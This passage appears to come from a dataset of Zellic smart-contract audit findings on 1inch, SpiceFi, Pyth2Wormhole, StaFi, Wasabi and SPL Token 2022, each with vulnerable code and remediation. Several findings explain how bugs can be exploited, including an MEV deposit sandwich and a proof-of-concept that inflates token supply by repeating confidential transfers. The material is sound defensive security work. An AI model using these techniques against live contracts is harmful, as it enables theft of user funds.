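An illustrative sketch of the missing declarations (the startFarming signature is assumed for illustration and should be copied from the concrete contracts): interface IFarm { function startFarming(uint256 amount, uint256 period) external; } interface IFarmingPool { function startFarming(uint256 amount, uint256 period) external; function decimals() external view returns (uint8); }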
", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.2 Slippage/manipulated exchange rates when depositing", + "labels": [ + "Zellic" + ], + "body": "Target: Drops4626 Category: Business Logic Likelihood: High Severity: Medium : Medium Certain vaults contain logic to exchange deposited assets (e.g., WETH) to the vault asset (CEther). The amount of CEther received by the mint called in deposit is determined by the current exchange rate, which can be manipulated by minting and redeeming. A MEV user could use these techniques to sandwich a large deposit and extract/steal the deposit of a vault user by following the actions below: The MEV user mints a lot of cETH. The large deposit goes through, but the vault user receives few cETH due to the bad exchange rate. The MEV user redeems the cETH, getting back more ETH than they started with, essentially eating into the deposit of the vault user. The deposits/withdrawals of vault users are at risk of being stolen. Add deposit call interfaces that allow users to specify minimum exchange rates. Spice Finance Inc. acknowledged and addressed the issue in commit 0d49a0b2 by implementing a slippage limited interface in the SpiceFi4626 contract, through which users are supposed to interact directly. We note that slippage protection is not implemented in the underlying Bend4626 and Drops4626 contracts, which are still potentially vulnerable if used directly; our understanding is that those contracts are not intended to be called directly.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potentially uninitialized implementation contracts", + "labels": [ + "Zellic" + ], + "body": "Target: Bend4626, Drops4626, SpiceFi4626, Vault Category: Coding Mistakes Likelihood: Informational Severity: Medium : Medium Implementation contracts designed to be called by a proxy should always be initialized to prevent potential takeovers. If an implementation contract is not initialized, an attacker could be able to initialize it and perform a selfdestruct, deleting the implementation contract and causing a denial of service. Ensure the implementation contract is always initialized. Following official OpenZeppelin documentation, this can be accomplished by defining a constructor on the contract: /// @custom:oz-upgrades-unsafe-allow constructor constructor() { _disableInitializers(); } For more information, refer to these OpenZeppelin documents. This was remediated in commit 5dfead1b by adding _disableInitializers.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.4 MaxWithdraw does not account for fees", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFi4626 Category: Business Logic Likelihood: Low Severity: Low : Low In the vault SpiceFi4626, the check for maximum withdrawals can pass but the call to _withdraw can still fail because fees are not accounted for. function maxWithdraw(address owner) public view override returns (uint256) { // ... return paused() ? 0 : _convertToAssets( balanceOf(owner), MathUpgradeable.Rounding.Down ).min(balance); } The code above returns the minimum of the owner\u2019s share balance (converted to assets) and the liquid capital of the vault.
In the case where a user specifies a withdrawal equal to the available vault balance, this check passes; however, later in _withdraw, all of the available capital is used in the call to super.withdraw, but then fee transfers are done, which would revert due to the lack of capital in the vault. function _withdraw(...) internal override { address feesAddr1 = getRoleMember(ASSET_RECEIVER_ROLE, 0); address feesAddr2 = getRoleMember(SPICE_ROLE, 0); uint256 fees = _convertToAssets(shares, MathUpgradeable.Rounding.Down) - assets; uint256 fees1 = fees.div(2); // Uses up entire available capital super._withdraw(caller, receiver, owner, assets, shares); // These calls will fail due to lack of capital. SafeERC20Upgradeable.safeTransfer( IERC20MetadataUpgradeable(asset()), feesAddr1, fees1 ); SafeERC20Upgradeable.safeTransfer( IERC20MetadataUpgradeable(asset()), feesAddr2, fees.sub(fees1) ); } In the edge case of a user having a balance corresponding to an amount higher than the capital available in the vault who would like to withdraw close to the maximum possible withdrawal, the withdrawal will revert with an incorrect message. Other smart contracts building on top of SpiceFi will receive incorrect quantities from maxWithdraw, resulting in reverts. Account for the fees in maxWithdraw. This was remediated in commit 37e0d2db by accounting for fees.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Potential rounding error", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFi4626 Category: Coding Mistakes Likelihood: Low Severity: Low : Low The SpiceFi4626::maxDeposit function computes the maximum amount of assets a user should be allowed to deposit, starting from the maximum amount of shares they are allowed to receive in order to not go above the maximum supply. The conversion between shares and assets is performed by rounding up, potentially leading to a slightly higher-than-expected limit. function maxDeposit(address) public view override returns (uint256) { return paused() ? 0 : _convertToAssets( maxTotalSupply - totalSupply(), MathUpgradeable.Rounding.Up ); } It might be possible to deposit slightly more assets than intended into the contract. Round down the conversion from shares to assets. This was remediated in commit bced4a44 by rounding down.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Possible usage of stale price information", + "labels": [ + "Zellic" + ], + "body": "Target: Solana attester, Ethereum and Terra consumer contracts Category: Business Logic Likelihood: High Severity: Critical : Critical The following four separate issues, when chained together, lead to a critical outcome: attest performs insufficient sanity checks The attest function (from attest.rs) of the Solana attester contract does not enforce any restriction on the publication timestamp of the price being attested. Therefore, it could be leveraged to publish out of date pricing information when the prices have not been updated for a while. Ethereum contract performs insufficient sanity checks The Ethereum contract consuming price attestations does not perform any sanity check on the price publication timestamp. A last-resort check is performed in queryPriceFeed on the price attestation timestamp.
This check is not particularly effective as the attestation timestamp represents when the attestation program attested the price information through Wormhole, not when the price itself was published. Terra contract performs insufficient sanity checks Similar to the Ethereum contract, the Terra contract does not perform any validation against the price publication timestamp. A check is performed in the query_price_info method against the attestation timestamp, but as stated previously, it is not sufficient to determine the liveliness of the pricing data, but merely the liveness of the stream of pricing information. Developer documentation misses important safety notice The documentation does not recommend the user to check the publication timestamp when retrieving a price, significantly increasing the likelihood of an unsafe usage of the API. In addition, users cannot retrieve the publication timestamp from the IPyth interface but instead have to use queryPriceFeed, which is not a part of IPyth. Stale price accounts can be passed to the attester program and reach Pyth users on other blockchain platforms. After discussion with the Pyth team, this category of publishing stale pricing information is considered critical. Pyth users are unlikely to have implemented sanity checks that prevent them from using outdated information since there\u2019s no recommendation to do so in Pyth documentation, and would therefore use the stale data. Recommendation Regarding the attester program: refuse to attest outdated prices, for instance by checking the publish_time field of the PriceAttestation struct. Regarding the Ethereum smart contract: if possible, add sanity checks on the price publication timestamp by default to all public facing functions; otherwise, expand IPyth to expose the information required to implement those sanity checks, and clearly document the need for it. Regarding the Terra smart contract: implement sanity checks on the price publication timestamp by default for all public facing functions. The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding and developed a patch for this issue: https://github.com/pyth-network/pyth2wormhole/pull/194 https://github.com/pyth-network/pyth2wormhole/pull/196", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.2 IPyth interface and implementation do not follow the recommended best practices", + "labels": [ + "Zellic" + ], + "body": "Target: Pyth2Wormhole Ethereum contract Category: Code Maturity Likelihood: N/A Severity: Low : Low The documentation for the IPyth public interface suggests the following best practices: Use products with at least 3 active publishers. Check the status of the product. Use the confidence interval to protect your users from price uncertainty. The first recommendation cannot be followed using only the functions exposed by IPyth, and the documentation does not elaborate on what additional functions should be used. IPyth exposes the following three functions: function getCurrentPrice(bytes32 id) external view returns (PythStructs.Price memory price); function getEmaPrice(bytes32 id) external view returns (PythStructs.
Price memory price); function getPrevPriceUnsafe(bytes32 id) external view returns (PythStructs.Price memory price, uint64 publishTime); PythStructs.Price does not contain information about how many publishers contributed to the given price. A user could still call queryPriceFeed (a public function which is not part of IPyth). This function returns an instance of PythStructs.PriceFeed, a struct that contains fields that can hold the required information. However, internally the contract does not copy this information from the price attestation. function newPriceInfo(PythInternalStructs.PriceAttestation memory pa) private view returns (PythInternalStructs.PriceInfo memory info) { info.attestationTime = pa.timestamp; // [code shortened for brevity] // These aren't sent in the wire format yet info.priceFeed.numPublishers = 0; info.priceFeed.maxNumPublishers = 0; return info; } This comment appears to be incorrect with respect to the attestation program reviewed by Zellic. The attest function creates instances of the PriceAttestation struct using PriceAttestation::from_pyth_price_bytes, which does set the num_publishers and max_num_publishers fields. Consumers of Pyth data on Ethereum might not follow the documented best practices and use unreliable price information. Recommendation Modify the IPyth interface to provide a way for Pyth users to read how many publishers were aggregated to compute a given price. Modify newPriceInfo to read from the price attestation the number of publishers that contributed to the price. The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has security implications. However, we may deploy a bug fix to address it.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Limited test-suite and code coverage", + "labels": [ + "Zellic" + ], + "body": "Target: Pyth2Wormhole attester contract Category: Code Maturity Likelihood: N/A Severity: Low : Low The Pyth Solana attester has only one test for the contract main function, attest (located in pyth2wormhole/client/tests/test_attest.rs). A comprehensive test-suite covering all functionality is very effective in discovering existing bugs and preventing future ones. Recommendation We highly recommend Pyth to develop a comprehensive test-suite with maximum code coverage. The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has security implications. However, we may deploy a bug fix to address it.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The migrate function can be recalled", + "labels": [ + "Zellic" + ], + "body": "Target: StakeManager Category: Business Logic Likelihood: Medium Severity: Medium : Medium The migrate function is responsible for migrating the state of the StakeManager contract when it is bridged to the Ethereum Mainnet. However, the current implementation lacks proper checks, allowing for the _rate to be set to zero, which would allow the function to be called again.
function migrate( address _poolAddress, uint256 _validatorId, uint256 _govDelegated, uint256 _bond, uint256 _unbond, uint256 _rate, uint256 _totalRTokenSupply, uint256 _totalProtocolFee, uint256 _era ) external onlyAdmin { require(rate == 0, \"already migrate\"); require(bondedPools.add(_poolAddress), \"already exist\"); validatorIdsOf[_poolAddress].add(_validatorId); poolInfoOf[_poolAddress] = PoolInfo({ bond: _bond, unbond: _unbond, active: _govDelegated }); rate = _rate; totalRTokenSupply = _totalRTokenSupply; totalProtocolFee = _totalProtocolFee; latestEra = _era; eraRate[_era] = _rate; } In addition to the obvious impact of the contract being migrated with incorrect values, if the _rate in the migrate function is set to zero, it opens the possibility of the function being called again, potentially causing unintended consequences for the contract. The limited severity in this case is due to the fact that the function can only be called by the contract\u2019s admin, and the admin is a trusted entity. We recommend ensuring that all parameters are comprehensively checked before the migration is allowed to proceed. One way to do this is to implement input validation checks in the migrate function to ensure that only valid and expected values are accepted for migration. Furthermore, we highly recommend explicitly checking the _rate parameter to ensure that it is not set to zero. This issue has been acknowledged by StaFi Protocol, and a fix was implemented in commit 1f980d34.", + "html_url": "https://github.com/Zellic/publications/blob/master/StaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Checks to limit parameters missing", + "labels": [ + "Zellic" + ], + "body": "Target: StakeManager Category: Code Maturity Likelihood: Medium Severity: Low : Low The init, setParams, and migrate functions are used for modifying the contract\u2019s most important state variables, such as the _eraSeconds, the _minStakeAmount, and more. However, these functions lack proper checks to ensure that the parameters are within acceptable ranges or that they are not set to zero. For example, despite the eraSeconds being checked against zero in the setParams function, there is no upper bound check to ensure that the _eraSeconds is not set to a value that is too large to be handled by the contract. function setParams( uint256 _unstakeFeeCommission, uint256 _protocolFeeCommission, uint256 _minStakeAmount, uint256 _unbondingDuration, uint256 _rateChangeLimit, uint256 _eraSeconds, uint256 _eraOffset ) external onlyAdmin { unstakeFeeCommission = _unstakeFeeCommission == 1 ? unstakeFeeCommission : _unstakeFeeCommission; protocolFeeCommission = _protocolFeeCommission == 1 ? protocolFeeCommission : _protocolFeeCommission; minStakeAmount = _minStakeAmount == 0 ? minStakeAmount : _minStakeAmount; rateChangeLimit = _rateChangeLimit == 0 ? rateChangeLimit : _rateChangeLimit; eraSeconds = _eraSeconds == 0 ? eraSeconds : _eraSeconds; eraOffset = _eraOffset == 0 ? eraOffset : _eraOffset; if (_unbondingDuration > 0) { unbondingDuration = _unbondingDuration; emit SetUnbondingDuration(_unbondingDuration); } } The lack of checks on the parameters may result in the contract being set to an invalid state or a state that is not expected by the contract\u2019s users.
For example, setting the _eraSeconds to a very large value may result in the contract being unable to handle eras properly, since it would take too long for the contract to progress to the next era. We recommend ensuring that all parameters are comprehensively checked, in a transparent way. One way to do this is to implement input validation checks in the setParams, migrate, and init functions to ensure that only valid and expected values are accepted for modification. This issue has been acknowledged by StaFi Protocol, and fixes were implemented in the following commits: 1f980d34 and c2053dc3.", + "html_url": "https://github.com/Zellic/publications/blob/master/StaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Solidity versioning permits underflow behavior", + "labels": [ + "Zellic" + ], + "body": "Target: All Category: Coding Mistakes Likelihood: Low Severity: Medium : High The contract specifies its version to be pragma solidity >=0.4.25 <0.9.0. This means the contract can be compiled with a version of Solidity that does not perform checked math. It is worth noting that while previous versions of Solidity (up to and including 0.7.x) did not automatically check for overflow and underflow, it was still possible to manually check for and handle such scenarios. However, in the ETH and ERC20 Wasabi pools, balance subtractions such as balance -= optionData.strikePrice were not properly guarded against underflow scenarios, which could result in a user\u2019s available balance being artificially inflated. Starting with Solidity version 0.8.x, the compiler performs automatic overflow and underflow checks, helping to prevent these kinds of issues. Therefore, it is recommended to use the latest version of Solidity and follow best practices for safe arithmetic operations to avoid potential issues with underflow and overflow. We recommend version locking to a 0.8.x version. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 63ab20b9.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Usage of transfer to send ETH can prevent receiving", + "labels": [ + "Zellic" + ], + "body": "Target: ETHWasabiPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The protocol employs Solidity\u2019s .transfer method to send Ether (ETH) to recipients. However, .transfer is limited to a hardcoded gas amount of 2,300, which may not be sufficient for contracts with logic in their fallback function. Consequently, these contracts may revert during the transaction. Additionally, the use of a hardcoded gas stipend may not be compatible with future changes to Ethereum gas costs, posing a potential risk to the protocol\u2019s long-term viability. function withdrawETH(uint256 _amount) external payable onlyOwner { if (availableBalance() < _amount) { revert InsufficientAvailableLiquidity(); } address payable to = payable(_msgSender()); to.transfer(_amount); emit ETHWithdrawn(_amount); } The withdrawETH function sends ETH to the designated recipient (msg.sender) using the to.transfer(_amount) method. However, if the recipient is a contract that incurs computational costs exceeding 2,300 gas upon receiving ETH, it will be unable to receive the funds. This poses a risk of failed transactions for contracts that have high gas costs, potentially leaving the designated recipient without access to their funds.
We suggest using the .call method to send ETH and verifying the return value to confirm a successful transfer. Solidity by Example offers a helpful guide on choosing the appropriate method for sending ETH, which can be found here: https://solidity-by-example.org/sending-ether/. Furthermore, since the withdrawETH function does not intend to receive ETH, the payable keyword can be removed. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 01ee7727.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Protocol does not check return value of ERC20 swaps", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiPoolFactory, ERC20WasabiPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The ERC20 standard requires that transfer operations return a boolean success value indicating whether the operation was successful or not. Therefore, it is important to check the return value of the transfer function before assuming that the transfer was successful. This helps ensure that the transfer was executed correctly and helps avoid potential issues with lost or mishandled funds. If the underlying ERC20 token does not revert on failure, the protocol\u2019s internal accounting will record failed transfer operations as successful. We recommend implementing one of the following solutions to ensure that ERC20 transfers are handled securely: 1. Utilize OpenZeppelin\u2019s SafeERC20 transfer methods, which provide additional checks and safeguards to ensure the safe handling of ERC20 transfers. 2. Strictly whitelist ERC20 coins that do not return false on failure and revert. This will ensure that only safe and reliable ERC20 tokens are used within the protocol. In general, it is important to exercise caution when integrating third-party tokens into the protocol. Tokens with hooks and atypical behaviors of the ERC20 standard can present security vulnerabilities that may be exploited by attackers. We recommend thoroughly researching and reviewing any tokens that are considered for integration and performing a comprehensive security review of the entire system to identify and mitigate any potential vulnerabilities. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 0b7bffe6.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Centralization risks", + "labels": [ + "Zellic" + ], + "body": "3.5 Centralization risks In the following three findings, the audit has identified centralization risks that users of the protocol should be aware of.
Although the impact of these risks is currently mitigated by Wasabi\u2019s role as the deployer and owner of the contracts, if the owner\u2019s keys were to be compromised or the owner becomes malicious, the impact on the protocol could be significant. To address this risk and increase user confidence and security, we recommend implementing measures to remove trust from the owner. Our recommendations are aimed at reducing centralization and increasing the resilience of the protocol. It\u2019s important to note that custody of private keys is crucial for maintaining control over the protocol. We recommend using a multisig wallet with multiple signers to enhance security.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Factory update logic of option NFT enables owner to steal funds", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiOption Category: Business Logic Likelihood: Low Severity: High : Low Each existing option corresponds to a WasabiOption NFT. For access control purposes, the contract stores the address of the corresponding WasabiPoolFactory. The factory provides an interface for pools to mint new option NFTs. However, it is important to note that the factory address can be upgraded in a way that allows the owner to potentially harm both individual option holders and all holders. Specifically, to remove existing positions, the owner can first call setFactory on the associated option NFT. This gives them access to the burn function: function burn(uint256 _optionId) external { require(msg.sender == factory, \"Only the factory can burn tokens\"); _burn(_optionId); } After they burn a given option NFT, the owner can use setFactory to replace the correct factory address and resume pool mechanics. When the owner burns option NFTs, it effectively denies their holders the right to exercise the option they purchased. Since ownership of these NFTs is checked during execution, it is crucial to ensure that the holder\u2019s rights are respected and they can exercise their options as intended. function validateOptionForExecution(uint256 _optionId, uint256 _tokenId) private { require(optionIds.contains(_optionId), \"WasabiPool: Option NFT doesn't belong to this pool\"); require(_msgSender() == optionNFT.ownerOf(_optionId), \"WasabiPool: Only the token owner can execute the option\"); WasabiStructs.OptionData memory optionData = options[_optionId]; require(optionData.expiry >= block.timestamp, \"WasabiPool: Option has expired\"); if (optionData.optionType == WasabiStructs.OptionType.CALL) { validateAndWithdrawPayment(optionData.strikePrice, \"WasabiPool: Strike price needs to be supplied to execute a CALL option\"); } else if (optionData.optionType == WasabiStructs.OptionType.PUT) { require(_msgSender() == nft.ownerOf(_tokenId), \"WasabiPool: Need to own the token to sell in order to execute a PUT option\"); } } Further, the owner can prevent all holders from exercising options simply by fixing the factory address at a different value.
Executing an option requires it to be successfully burned, and the factory loses the right to do so: function clearOption(uint256 _optionId, uint256 _tokenId, bool _executed) internal { WasabiStructs.OptionData memory optionData = options[_optionId]; if (optionData.optionType == WasabiStructs.OptionType.CALL) { if (_executed) { // Sell to executor, the validateOptionForExecution already checked if strike is paid nft.safeTransferFrom(address(this), _msgSender(), optionData.tokenId); tokenIds.remove(optionData.tokenId); } if (tokenIdToOptionId[optionData.tokenId] == _optionId) { delete tokenIdToOptionId[optionData.tokenId]; } } else if (optionData.optionType == WasabiStructs.OptionType.PUT) { if (_executed) { // Buy from executor nft.safeTransferFrom(_msgSender(), address(this), _tokenId); payAddress(_msgSender(), optionData.strikePrice); } } options[_optionId].active = false; factory.burnOption(_optionId); } We recommend that Wasabi implement one of the following solutions: Prevent factory upgrades in the WasabiOption NFT, or Support multiple factories, allowing them to be added but not removed. This would also require more granular access control (specifically, storing which NFTs a given factory is permitted to burn). This issue has been acknowledged by Wasabi, and a fix was implemented in commit 1aca0ac1.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Pool toggling functionality may allow factory owner to lock exercising of options", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiFactory Category: Business Logic Likelihood: Low Severity: High : Low The WasabiFactory contract allows its owner to toggle pools. function togglePool(address _poolAddress, bool _enabled) external onlyOwner { require(poolAddresses[_poolAddress] != _enabled, 'Pool already in same state'); poolAddresses[_poolAddress] = _enabled; } This prevents them from burning options: function burnOption(uint256 _optionId) external { require(poolAddresses[msg.sender], \"Only enabled pools can burn options\"); options.burn(_optionId); } When pools are disabled, the existing options associated with those pools become unexercisable. This effectively allows the owner to prevent option holders from utilizing the options they have purchased. Disabling pools is a reasonable functionality; however, it should not have an impact on the options that have already been issued. One possible solution would be to allow disabled pools to burn options but not mint new ones. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 28e1245c.", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing check in process_transfer leading to inflationary bug", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Transfers between confidential accounts require a zero knowledge (ZK) argument proving that the source account balance is greater than the transferred amount and that the transferred amount is not negative. Confidential token transfer transactions consist of two instructions. The first required instruction contains a cryptographic ZK argument that proves the validity of the transfer without disclosing any information about the balances involved or the transferred amount.
The other instruction performs the computations and updates the account state to actually perform the transfer. The ZK argument instruction is processed by a special built-in program that verifies its validity, reverting if validation fails. More specifically, the ZK argument is an equation in which some variables have values that correspond to the state of the accounts involved in the transaction. The other instruction is processed by the token program. The program verifies that the instruction containing the ZK argument exists and that its inputs are consistent with the state of the involved accounts, tying the ZK argument to the state of the blockchain. The token program does not correctly verify all the ZK argument inputs. One of the fields associated with the ZK argument, new_source_ciphertext, is ignored. This field contains the expected value of the source account encrypted balance after the transfer is performed. The lack of this check implies that the source account encrypted balance is not validated. This effectively decouples the ZK argument from the balance of the source account. A malicious transaction constructed to exploit the issue allows an attacker to perform repeated transfers, totalling an amount bigger than the source account encrypted balance. We created a proof-of-concept exploit by constructing a transaction with multiple instructions performing a transfer, all referencing the same instruction containing the ZK argument. The source account encrypted balance underflows and becomes invalid, but the destination account encrypted pending balance is credited multiple times, creating tokens out of nothing and inflating the supply. The supply inflation will not be reflected by the information stored in the mint account associated with the token. The destination account is able to apply the pending balance and make use of the unfairly obtained amount normally. The PoC would perform the following operations: [!] Starting double transfer PoC [!] Current balances: Alice: - available balance: 42 - pending balance: 0 Bob: - available balance: 0 - pending balance: 0 [!] Running malicious transaction. Instructions: - Instruction 0: TransferWithFeeData instruction - amount: 42 - Instruction 1: ConfidentialTransferInstruction::Transfer instruction - Instruction 2: ConfidentialTransferInstruction::Transfer instruction (repeated) [!] Current balances: Alice: could not decrypt balances Bob: - available balance: 0 - pending balance: 84 [!] Applying Bob pending balance [!] Current balances: Alice: could not decrypt balances Bob: - available balance: 84 - pending balance: 0 Ensure that the source account encrypted balance corresponds to the expected amount contained in the ZK argument (the new_source_ciphertext field of the TransferData struct). The Solana Foundation team was alerted of this finding while the audit was ongoing. The team quickly confirmed the issue and submitted a remediation patch for our review. The patch correctly implements the suggested remediation. Pull request #3867 fixes the issue following our recommendation. The PR head commit c7fbd4b was merged in the master branch on December 3, 2022. The confidential token transfer extension was not used at the time the audit was conducted; therefore, no funds were at risk. 
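For reference, the binding check the patch adds can be sketched as follows. This is a minimal, language-neutral illustration written in Go (the actual program is Rust, and every type and helper name here is hypothetical): recompute the expected post-transfer source ciphertext from the current account state and compare it against the new_source_ciphertext value the ZK argument was verified against.
package sketch

import (
	\"bytes\"
	\"errors\"
)

// Ciphertext is an opaque ElGamal ciphertext (hypothetical representation).
type Ciphertext []byte

// TransferData mirrors only the ZK-argument fields relevant here
// (hypothetical Go stand-ins for the real Rust structures).
type TransferData struct {
	EncryptedAmount     Ciphertext
	NewSourceCiphertext Ciphertext
}

// verifyTransferBinding recomputes the expected post-transfer source
// ciphertext from the current account state and rejects the transfer when it
// does not match the value the ZK argument was verified against. The
// homomorphic subtraction is passed in as sub to keep the sketch abstract.
func verifyTransferBinding(sourceBalance Ciphertext, td TransferData, sub func(balance, amount Ciphertext) Ciphertext) error {
	expected := sub(sourceBalance, td.EncryptedAmount)
	if !bytes.Equal(expected, td.NewSourceCiphertext) {
		return errors.New(\"new_source_ciphertext is not bound to the source account state\")
	}
	return nil
}
This ties the ZK argument to the account actually being debited, so one verified argument cannot be replayed against a stale or unrelated balance.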
", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing check in process_withdraw potentially leading to inflationary bug", + "labels": [ + "Zellic" + ], + "body": " Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical Withdrawals from a token account confidential balance to its cleartext balance require a zero-knowledge (ZK) argument that proves that the account encrypted balance is greater than the withdrawn amount. Confidential withdraw transactions consist of two instructions. One contains the aforementioned ZK argument and is processed by a special built-in program that verifies its validity, reverting the transaction in case of failure. The other instruction, processed by SPL Token 2022, performs the operations on the balances to actually accomplish the withdrawal. The token program verifies that the instruction containing the ZK argument exists and that its inputs are consistent with the state of the involved accounts, tying the ZK argument to the state of the blockchain. The token program does not correctly verify that the public key associated with the ZK argument corresponds to the public key associated with the source account encrypted balance. This potentially allows an attacker to forge a ZK argument asserting the validity of any desired withdrawal amount, regardless of the actual encrypted balance of the source account. Refer to section 5 for more information on the equations implementing the ZK argument. An attacker might be able to exploit this issue and withdraw an arbitrary amount of tokens to their cleartext balance, creating tokens from nothing and inflating the supply. Note that the supply inflation will not be reflected by the information stored in the mint account associated with the token. The plaintext balance is spendable, exactly like any other regular plaintext balance on a legitimate account. We did not fully confirm exploitability of this issue, but the team agreed that it is likely possible to forge a malicious ZK equality argument. Ensure that the public key associated with the source account corresponds to the public key associated with the ZK argument (the pubkey field of the WithdrawData struct). The Solana Foundation team was alerted of this finding while the audit was ongoing. The team quickly helped confirm the issue. Pull request #3768 fixes the issue following our recommendation. The PR head commit 94b912a was merged in the master branch on October 27, 2022. The confidential token transfer extension was not used at the time the audit was conducted; therefore, funds were not at risk.", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing public key check in EmptyAccount leading to deflationary bug", + "labels": [ + "Zellic" + ], + "body": " Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: Low Severity: High Impact: Low A token account can only be closed if it has a zero balance. This applies to the regular cleartext balance as well as to the balances managed by the confidential transfer extension. 
Since the latter balances are encrypted, a special instruction called EmptyAccount has to be executed before closing the account, which enables closing the account after verifying a zero-knowledge (ZK) argument that proves the account balance is zero. Similarly to other confidential token operations, a ZK argument has to be embedded in an instruction in the same transaction that invokes EmptyAccount. The processor for EmptyAccount verifies that the ZK argument exists and that it is correctly tied to the current state of the blockchain. The function processing the EmptyAccount instruction does not check that the public key associated with the ZK argument corresponds to the public key of the token account to be closed. This might allow an attacker to forge a ZK argument, falsely showing the account balance to be zero. By closing an account with a nonzero balance, an attacker would be able to decrease the circulating supply without causing an update to the supply information stored in the mint account. The attacker would have to give up their balance; therefore, it is difficult to imagine an incentive to perform such an attack. Furthermore, the same effect could be obtained by simply keeping the tokens in the attacker\u2019s account. For this reason, this issue is classified as low likelihood and low impact. Ensure that the public key associated with the proof corresponds to the public key of the account being closed. Pull request #3767 fixes the issue following our recommendation. The PR head commit d6a72eb was merged in the master branch on October 27, 2022.", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Confidential transfer amounts information leak via transfer fees", + "labels": [ + "Zellic" + ], + "body": " Target: Confidential Transfer Extension Category: Business Logic Likelihood: N/A Severity: Low Impact: Low Tokens managed by SPL Token 2022 can be configured to require a transfer fee consisting of a percentage of the transferred amount (with the possibility to cap the maximum fee at a fixed amount). This configuration also applies to confidential transfers, relying on zero-knowledge cryptographic arguments to prove the validity of the encrypted balances being manipulated. Information about the value of every transfer is leaked to the owner of the keys controlling the transfer fees for the mint. The owner of the private key associated with management of the transfer fees can gather information on the value of confidential transfers. Since the key is able to decrypt the fee balance before and after the transfer has occurred, the fee amount for every transfer can be obtained. If the fee is lower than the cap amount, then the exact transferred amount can be inferred. Otherwise, the transferred amount is guaranteed to be at least as big as the minimum amount that would require the maximum fee. Completely blinding the transfer fee amounts appears to be challenging and likely to require a significant engineering effort. If this information leak is accepted, we suggest informing SPL token developers and users of this privacy pitfall of confidential transfers involving fees. Pull request #3773 addresses the issue by adding more documentation on the confidential transfer extension code, acknowledging the potential information leak if a confidential transfer with fees is performed. 
The PR head commit 1c3af5e was merged in the master branch on October 28, 2022.", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Confidential transfer fees\u2019 withdrawal instructions ignore constraints", + "labels": [ + "Zellic" + ], + "body": " Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Low The functions handling the confidential transfer instructions WithdrawWithheldTokensFromAccounts and WithdrawWithheldTokensFromMint ignore some of the restrictions that can be applied to confidential token accounts: allow_balance_credits: An account can be configured to deny credits to its pending balance. pending_balance_credit_counter: This value should be checked not to be greater than maximum_pending_balance_credit_counter. The instructions also do not increment pending_balance_credit_counter. We note that these instructions directly add the entire value of the withheld balance to the pending_balance_lo of the destination account. This could potentially cause the pending balance to become bigger than 2^16 or even 2^32, making decryption of the balance difficult. An attacker with control of the keys trusted with managing transfer fees could credit the encrypted pending balance of an account, bypassing the configuration applied by the account owner, and potentially make it difficult for the victim to decrypt the encrypted balance. Revert the transaction if allow_balance_credits is set on the destination account. Revert the transaction if pending_balance_credit_counter is not less than maximum_pending_balance_credit_counter. Increment pending_balance_credit_counter after the transfer has taken place. Since the value of the transferred balances is encrypted, limiting the transferred value to avoid overflowing the soft limit of 2^32 is challenging and would require extensive modifications. Pull request #3774 fixes the issue following our recommendation. The PR head commit 16384e2 was merged in the master branch on October 28, 2022. The confidential token transfer extension was not used at the time the audit was conducted; therefore, funds were not at 